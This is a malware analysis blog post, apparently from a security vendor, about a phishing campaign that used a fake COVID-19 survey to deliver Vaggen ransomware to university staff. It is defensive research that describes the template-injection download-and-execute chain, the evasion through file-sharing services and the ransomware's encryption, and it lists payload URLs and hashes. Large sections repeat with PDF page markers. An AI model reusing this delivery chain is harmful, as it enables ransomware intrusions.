Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it was successful (the return value would be the task ID of the executed application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here, using a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with the .VAGGEN extension) consists of:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM 
Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1061 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1062 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1063 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1064 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1065 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1066 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1067 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1068 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1069 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1070 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1071 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1072 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1073 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1074 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1075 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1076 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1077 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1078 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1079 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1080 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1081 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1082 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1083 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1084 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1085 of 
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection (a link behind a sharing-service login is harder for mail filters and URL scanners to fetch), or perhaps the attacker expected the target organization to already be using one of these two sharing services.
Phishing document analysis
The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The shared .docx therefore carries no macro of its own; it only holds a reference to the remote .dotm, which Word fetches when the document is opened, so the payload lives outside the file the victims received.
That file was uploaded to a free code hosting website (notabug.org).
When the macro is executed, it does the following:
1. Gets the %APPDATA% directory.
2. Creates the Byxor directory in %APPDATA%.
3. Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe and writes it as Polisen.exe.
4. Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe and writes it as Killar.exe.
5. Calls the Shell function to execute killar.exe.
6. Checks the return value of Shell to see whether the launch was successful (on success, Shell returns the task ID of the executed application).
7. If successful, it sends an HTTP GET request to canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp; if not, it sends an HTTP GET request to canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html.
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.
